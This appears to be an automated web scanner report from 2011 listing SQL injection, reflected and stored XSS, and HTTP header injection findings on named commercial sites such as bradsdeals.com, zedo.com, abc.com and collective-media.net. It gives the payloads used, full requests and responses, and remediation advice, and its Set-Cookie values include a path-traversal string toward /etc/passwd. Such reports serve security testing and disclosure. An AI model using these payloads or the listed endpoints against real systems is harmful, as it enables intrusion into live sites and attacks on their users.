GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=18 Expires: Sat, 17 Sep 2011 01:49:38 GMT Date: Sat, 17 Sep 2011 01:49:20 GMT Content-Length: 2692 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'; ...[SNIP]...
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=21 Expires: Sat, 17 Sep 2011 01:49:37 GMT Date: Sat, 17 Sep 2011 01:49:16 GMT Content-Length: 2692 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}
The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.
The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 145111 Content-Type: text/javascript Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed10 X-Powered-By: ASP.NET Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=272 Date: Sat, 17 Sep 2011 01:02:32 GMT Connection: close
The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 1037 Content-Type: text/xml Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed04 X-Powered-By: ASP.NET Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=279 Date: Sat, 17 Sep 2011 01:03:31 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.rev_bostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 01:13:10 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT Content-Length: 482
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Date: Sat, 17 Sep 2011 01:13:16 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT Content-Length: 482
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/iblocal.revinet.bostonherald/audience
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Date: Sat, 17 Sep 2011 01:13:02 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT Content-Length: 485
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 01:13:00 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT Content-Length: 482
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/be_news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
